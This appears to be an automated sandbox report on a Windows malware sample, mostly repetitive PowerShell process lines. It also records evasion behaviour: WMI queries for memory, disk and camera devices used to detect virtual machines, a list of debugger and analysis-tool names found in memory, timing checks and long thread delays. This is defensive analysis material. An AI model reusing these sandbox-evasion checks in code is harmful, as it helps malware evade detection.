Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\System32\regsvr32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\System32\regsvr32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\regsvr32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\System32\regsvr32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: regsvr32.exe, 0000000F.00000002.2611113584.000000000063B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IDAG.EXE
Source: regsvr32.exe, 0000000F.00000002.2611113584.000000000063B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXE
Source: regsvr32.exe, 0000000F.00000002.2611113584.000000000063B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: regsvr32.exe, 0000000F.00000002.2611113584.000000000063B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WINDBG.EXES{
Source: regsvr32.exe, 0000000F.00000002.2611113584.000000000063B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IDAQ.EXE
Source: regsvr32.exe, 0000000F.00000002.2611113584.000000000063B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSANALYZER.EXE

Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 2D60000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 1B2D0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 9_2_00007FFD34520060 rdtsc

9_2_00007FFD34520060

Source: C:\Windows\System32\regsvr32.exe

9_2_00007FFDA338B900

Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\regsvr32.exe	Window / User API: threadDelayed 3403	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Window / User API: threadDelayed 6329	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5928	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3881	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5973
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3745
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7067
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2539

Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GLDSV.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GLDSV.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\netapi32_1.drv (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\is-O7IBF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GLDSV.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-66O79.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_setup64.tmp	Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe

API coverage: 7.0 %

Source: C:\Windows\System32\regsvr32.exe TID: 2032	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2032	Thread sleep time: -31000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2032	Thread sleep time: -30891s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7080	Thread sleep count: 3403 > 30	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 7080	Thread sleep count: 6329 > 30	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2032	Thread sleep time: -30781s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2032	Thread sleep time: -30671s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2032	Thread sleep time: -30562s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2032	Thread sleep time: -30453s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2032	Thread sleep time: -30343s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2032	Thread sleep time: -30234s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2032	Thread sleep time: -30125s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2032	Thread sleep time: -30016s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6072	Thread sleep count: 5928 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6120	Thread sleep count: 3881 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6964	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3352	Thread sleep count: 5973 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1864	Thread sleep count: 3745 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 432	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2488	Thread sleep count: 7067 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052	Thread sleep count: 2539 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1268	Thread sleep time: -4611686018427385s >= -30000s

